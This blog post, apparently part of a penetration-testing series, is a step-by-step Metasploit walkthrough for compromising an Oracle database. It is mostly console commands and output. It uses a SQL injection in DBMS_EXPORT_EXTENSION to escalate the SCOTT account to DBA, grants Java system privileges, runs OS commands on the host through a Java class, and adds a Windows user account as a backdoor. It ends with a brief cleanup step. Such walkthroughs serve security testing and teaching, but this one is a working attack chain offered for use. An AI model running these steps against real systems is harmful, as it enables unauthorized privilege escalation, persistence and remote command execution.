Oracle Pwnage with the Metasploit Oracle Modules Part 2 's

Posted by CG

Last post we got to where we could execute SQL queries on the box and were able to see Scott’s permissions.

Let’s use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott’s account.

As you recall….

msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed

Let’s try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/
use auxiliary/sqli/oracle/ctxsys_driload
use auxiliary/sqli/oracle/dbms_export_extension
use auxiliary/sqli/oracle/dbms_metadata
use auxiliary/sqli/oracle/lt_findricset
use auxiliary/sqli/oracle/pitrig_truncate
msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info

Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
DBA SCOTT no DB user to elevate to DBA.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run

[*] Sending package…
[*] Done…
[*] Sending body…
[*] Done…
[*] Sending declare…
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

Let’s check…

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > **Same settings as before; check user’s roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <–New Privileges
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let’s add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL “grant javasyspriv to SCOTT”
SQL => grant javasyspriv to SCOTT
msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] Done…
[*] Auxiliary module execution completed

Let’s check to see if it worked

msf auxiliary(oracle_sql) > set SQL “select * from user_role_privs”
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO
[*] SCOTT,JAVASYSPRIV,NO,YES,NO <– Yup it worked
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

From there we can use the oracle_win32 auxiliary module to execute commands
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
—- ————- ——– ———–
CMD echo metasploit > %SYSTEMDRIVE%//unbreakable.txt no The OS command to execute.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD “net user dba [email protected] /add”
CMD => net user dba [email protected] /add
msf auxiliary(oracle_win32) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class…
[*] Done…
[*] Creating MSF procedure…
[*] Done…
[*] Sending command: ‘net user dbaa [email protected] /add’
[*] Done…
[*] Auxiliary module execution completed

or you can test you are executing commands with ping

msf auxiliary(oracle_win32) > set CMD “ping 192.168.100.50”
CMD => ping 192.168.100.50
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class…
[*] Done…
[*] Creating MSF procedure…
[*] Done…
[*] Sending command: ‘ping 192.168.100.50’
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_win32) >

on the other end, run tcpdump and filter for ICMP.

sudo tcpdump -i eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40
01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40
—SNIP—

8 packets captured
8 packets received by filter
0 packets dropped by kernel

For the ninja shit, check out MC’s demo text file.

**Issues, you cant see the output of your command, so you have to run stuff that you can see the results of, see the demo text file.

If you care to clean up, just revoke your DBA privileges with the oracle_sql module

“revoke dba from scott”
“revoke javaprivs from scott”

That’s it!